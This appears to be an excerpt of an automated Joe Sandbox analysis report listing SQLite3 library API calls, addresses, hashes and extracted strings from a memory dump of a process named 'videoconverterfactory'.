                                                                                                      • String ID: offsets
                                                                                                      • API String ID: 463808202-2642679573
                                                                                                      • Opcode ID: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                                      • Instruction ID: 1101d6838161b799219a4b3d5732631e197d31251dd2d8b91c34f261bd2faa79
                                                                                                      • Opcode Fuzzy Hash: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                                      • Instruction Fuzzy Hash: 72C1D374A183198FDB14CF59C580B8EBBF2BFA8314F2085A9E849AB354D734D985CF52
                                                                                                      APIs
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                                                                      • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                                                                      • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                                                                      • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                                                                      • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                                                                      • String ID:
                                                                                                      • API String ID: 2903785150-0
                                                                                                      • Opcode ID: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                                      • Instruction ID: 050d84d3da0bd462ad4a4a15df4a38950001fc66f1de33c81d7c2c3a6f7146e7
                                                                                                      • Opcode Fuzzy Hash: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                                      • Instruction Fuzzy Hash: 8971D074E086599FCF00DFA8C88069DBBF2BF59314F1485AAE855AB304E734EC85CB91
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_freesqlite3_malloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 423083942-0
                                                                                                      • Opcode ID: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                                                      • Instruction ID: dba10035f3c017a022ff92dc0406edc4c972eb6647695f7afdbed5011b3e14eb
                                                                                                      • Opcode Fuzzy Hash: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                                                      • Instruction Fuzzy Hash: 9112E3B4A15218CFCB18CF98D480A9EBBF6BF98304F24855AD855AB319D774EC42CF90
                                                                                                      APIs
                                                                                                      • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                                      • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
                                                                                                      • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
                                                                                                      • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
                                                                                                      • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
                                                                                                      • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
                                                                                                      • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
                                                                                                      • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
                                                                                                      • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
                                                                                                      • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                                      • String ID:
                                                                                                      • API String ID: 3556715608-0
                                                                                                      • Opcode ID: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                                      • Instruction ID: 37d7613b282c24208f37f95ee69ae3eaf9c0527d79975c213f2f38643f7f707f
                                                                                                      • Opcode Fuzzy Hash: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                                      • Instruction Fuzzy Hash: FEA14A71A2C215CBEB009F69CC843257FE7B7A7318F10816DD415AB2A0E7B9DC95EB11
                                                                                                      APIs
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 6095F645
                                                                                                      • sqlite3_exec.SQLITE3 ref: 6095F686
                                                                                                        • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                                      • sqlite3_free_table.SQLITE3 ref: 6095F6A0
                                                                                                      • sqlite3_mprintf.SQLITE3 ref: 6095F6C7
                                                                                                        • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                                        • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                                      • sqlite3_free.SQLITE3 ref: 6095F6B4
                                                                                                        • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                      • sqlite3_free.SQLITE3 ref: 6095F6D4
                                                                                                      • sqlite3_free.SQLITE3 ref: 6095F6ED
                                                                                                      • sqlite3_free_table.SQLITE3 ref: 6095F6FF
                                                                                                      • sqlite3_realloc.SQLITE3 ref: 6095F71B
                                                                                                      • sqlite3_free_table.SQLITE3 ref: 6095F72D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_freesqlite3_free_table$sqlite3_execsqlite3_initializesqlite3_logsqlite3_mallocsqlite3_mprintfsqlite3_mutex_entersqlite3_reallocsqlite3_vmprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 1866449048-0
                                                                                                      • Opcode ID: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                                                                      • Instruction ID: 9ac78cbffd0e0cf27e5d0fdbf17c3a3d034f00011a14f89e76d08e502163788c
                                                                                                      • Opcode Fuzzy Hash: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                                                                      • Instruction Fuzzy Hash: 8751F1B49467099FDB01DF69D59178EBBF6FF68318F104429E884AB300D379D894CB91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                                                                      • API String ID: 0-780898
                                                                                                      • Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                                      • Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
                                                                                                      • Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                                      • Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
                                                                                                      • API String ID: 0-2604012851
                                                                                                      • Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                                      • Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
                                                                                                      • Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                                      • Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmp$sqlite3_logsqlite3_mutex_try
                                                                                                      • String ID: 0$SQLite format 3
                                                                                                      • API String ID: 3174206576-3388949527
                                                                                                      • Opcode ID: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                                                                      • Instruction ID: d3cc03899c2fb96d27ccc41cf7ad58ff30b38a29db2c3208110d6cb2c70dce50
                                                                                                      • Opcode Fuzzy Hash: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                                                                      • Instruction Fuzzy Hash: A3028BB0A082659BDB09CF68D48178ABBF7FFA5308F148269E8459B345DB74DC85CF81
                                                                                                      APIs
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6095F030
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6095F03E
                                                                                                      • sqlite3_stricmp.SQLITE3 ref: 6095F0B3
                                                                                                      • sqlite3_free.SQLITE3 ref: 6095F180
                                                                                                        • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
                                                                                                        • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
                                                                                                      • sqlite3_free.SQLITE3 ref: 6095F1BD
                                                                                                        • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                      • sqlite3_result_error_code.SQLITE3 ref: 6095F34E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
                                                                                                      • String ID: |
                                                                                                      • API String ID: 1576672187-2343686810
                                                                                                      • Opcode ID: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                                                      • Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
                                                                                                      • Opcode Fuzzy Hash: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                                                      • Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
                                                                                                      APIs
                                                                                                      • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                                                                        • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                                                                      • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                                                                      • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                                                                      • String ID: $)><$sqlite_master$sqlite_temp_master
                                                                                                      • API String ID: 652164897-1572359634
                                                                                                      • Opcode ID: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                                                      • Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
                                                                                                      • Opcode Fuzzy Hash: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                                                      • Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
                                                                                                      APIs
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6091B06E
                                                                                                      • sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
                                                                                                      • sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
                                                                                                      • sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                                      • String ID:
                                                                                                      • API String ID: 2352520524-0
                                                                                                      • Opcode ID: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
                                                                                                      • Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
                                                                                                      • Opcode Fuzzy Hash: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
                                                                                                      • Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
                                                                                                      APIs
                                                                                                        • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                                        • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                                        • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                                      • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                                                                        • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                                      • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                                                                        • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                                        • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                                        • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                                      • sqlite3_exec.SQLITE3 ref: 6096A523
                                                                                                      • sqlite3_exec.SQLITE3 ref: 6096A554
                                                                                                      • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                                                                      • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                                      • String ID: optimize
                                                                                                      • API String ID: 3659050757-3797040228
APIs
• sqlite3_column_blob.SQLITE3 ref: 609654FB
• sqlite3_column_bytes.SQLITE3 ref: 60965510
• sqlite3_reset.SQLITE3 ref: 60965556
• sqlite3_reset.SQLITE3 ref: 609655B8
  • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
  • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
• sqlite3_malloc.SQLITE3 ref: 60965655
• sqlite3_free.SQLITE3 ref: 60965714
• sqlite3_free.SQLITE3 ref: 6096574B
  • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
• sqlite3_free.SQLITE3 ref: 609657AA
Similarity
• API ID: sqlite3_free$sqlite3_mutex_entersqlite3_reset$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mutex_leave
• String ID:
• API String ID: 2722129401-0
APIs
• sqlite3_malloc.SQLITE3 ref: 609645D9
  • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
• sqlite3_free.SQLITE3 ref: 609647C5
  • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
• sqlite3_free.SQLITE3 ref: 6096476B
  • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
• sqlite3_free.SQLITE3 ref: 6096477B
• sqlite3_free.SQLITE3 ref: 60964783
Similarity
• API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
• String ID:
• API String ID: 571598680-0
APIs
• sqlite3_blob_reopen.SQLITE3 ref: 60963510
  • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
• sqlite3_mprintf.SQLITE3 ref: 60963534
• sqlite3_blob_open.SQLITE3 ref: 6096358B
• sqlite3_blob_bytes.SQLITE3 ref: 609635A3
• sqlite3_malloc.SQLITE3 ref: 609635BB
• sqlite3_blob_read.SQLITE3 ref: 60963602
• sqlite3_free.SQLITE3 ref: 60963621
Similarity
• API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
• String ID:
• API String ID: 4276469440-0
APIs
• sqlite3_value_text.SQLITE3 ref: 6091A240
• sqlite3_value_text.SQLITE3 ref: 6091A24E
• sqlite3_value_bytes.SQLITE3 ref: 6091A25A
• sqlite3_value_text.SQLITE3 ref: 6091A27C
Strings
• ESCAPE expression must be a single character, xrefs: 6091A293
• LIKE or GLOB pattern too complex, xrefs: 6091A267
Similarity
• API ID: sqlite3_value_text$sqlite3_value_bytes
• String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
• API String ID: 4080917175-264706735
APIs
  • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
• sqlite3_mutex_enter.SQLITE3 ref: 609250E7
• sqlite3_value_text16.SQLITE3 ref: 60925100
• sqlite3_value_text16.SQLITE3 ref: 6092512C
• sqlite3_mutex_leave.SQLITE3 ref: 6092513E
Strings
Similarity
• API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
• String ID: library routine called out of sequence$out of memory
• API String ID: 2019783549-3029887290
APIs
• sqlite3_finalize.SQLITE3 ref: 609406E3
  • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940672
  • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940696
• sqlite3_free.SQLITE3 ref: 609406F7
• sqlite3_free.SQLITE3 ref: 60940705
• sqlite3_free.SQLITE3 ref: 60940713
• sqlite3_free.SQLITE3 ref: 6094071E
• sqlite3_free.SQLITE3 ref: 60940729
• sqlite3_free.SQLITE3 ref: 6094073C
Similarity
• API ID: sqlite3_free$sqlite3_log$sqlite3_finalize
• String ID:
• API String ID: 1159759059-0
APIs
• sqlite3_free.SQLITE3(?), ref: 609476DD
  • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
• sqlite3_log.SQLITE3 ref: 609498F5
Strings
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                                                                      • String ID: List of tree roots: $d$|
                                                                                                      • API String ID: 3709608969-1164703836
                                                                                                      • Opcode ID: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                                                      • Instruction ID: c91562837ba2d96ae21b52ab8334c840e7cbe23d8154f1acff92b465618a0bd4
                                                                                                      • Opcode Fuzzy Hash: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                                                      • Instruction Fuzzy Hash: 3FE10570A043698BDB22CF18C88179DFBBABF65304F1185D9E858AB251D775DE81CF81
                                                                                                      APIs
                                                                                                        • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                                        • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                                        • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                                        • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 609600BA
                                                                                                      • sqlite3_column_text.SQLITE3 ref: 609600EF
                                                                                                      • sqlite3_free.SQLITE3 ref: 6096029A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                                                                      • String ID: e
                                                                                                      • API String ID: 786425071-4024072794
                                                                                                      • Opcode ID: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                                      • Instruction ID: e80500568aa73e744b5c90812a7938b6c4ac38b40afb48beb036dafaf3e7d002
                                                                                                      • Opcode Fuzzy Hash: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                                      • Instruction Fuzzy Hash: 6291E270A18609CFDB04CF99C494B9EBBF2BF98314F108529E869AB354D774E885CF91
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_exec
                                                                                                      • String ID: sqlite_master$sqlite_temp_master$|
                                                                                                      • API String ID: 2141490097-2247242311
                                                                                                      • Opcode ID: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                                      • Instruction ID: 9143400cfb6dc20a8edc2ca7c04099347fc9d468871a1d2187ae3123f936d49a
                                                                                                      • Opcode Fuzzy Hash: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                                      • Instruction Fuzzy Hash: C551B6B09083289BDB26CF18C885799BBFABF59304F108599E498A7351D775DA84CF41
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_free$memcmpsqlite3_realloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 3422960571-0
                                                                                                      • Opcode ID: 50eda45380483794e32bdd730fc6b6b580c41d30328003452ec2c22d7d846426
                                                                                                      • Instruction ID: 3b390e38dde49c5924589a602beaf2ee173d98914be71c714148da16d267e2cf
                                                                                                      • Opcode Fuzzy Hash: 50eda45380483794e32bdd730fc6b6b580c41d30328003452ec2c22d7d846426
                                                                                                      • Instruction Fuzzy Hash: 42B1D0B4E142189BEB05CFA9C5807DDBBF6BFA8304F148429E858A7344D374E946CF91
                                                                                                      APIs
                                                                                                        • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 6094B1D1
                                                                                                      • sqlite3_value_bytes.SQLITE3 ref: 6094B24C
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 6094B272
                                                                                                      • sqlite3_value_blob.SQLITE3 ref: 6094B298
                                                                                                      • sqlite3_free.SQLITE3 ref: 6094B2C8
                                                                                                        • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                                                        • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                                                        • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                                                        • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
                                                                                                      • String ID:
                                                                                                      • API String ID: 683514883-0
                                                                                                      • Opcode ID: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                                                      • Instruction ID: 83940ce9cf0a2bab7a741171fc95cc3a005d2848f59039768723a80715f2adcb
                                                                                                      • Opcode Fuzzy Hash: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                                                      • Instruction Fuzzy Hash: E19133B1A052099FCB04CFA9D490B9EBBF6FF68314F108569E855AB341DB34ED81CB91
                                                                                                      APIs
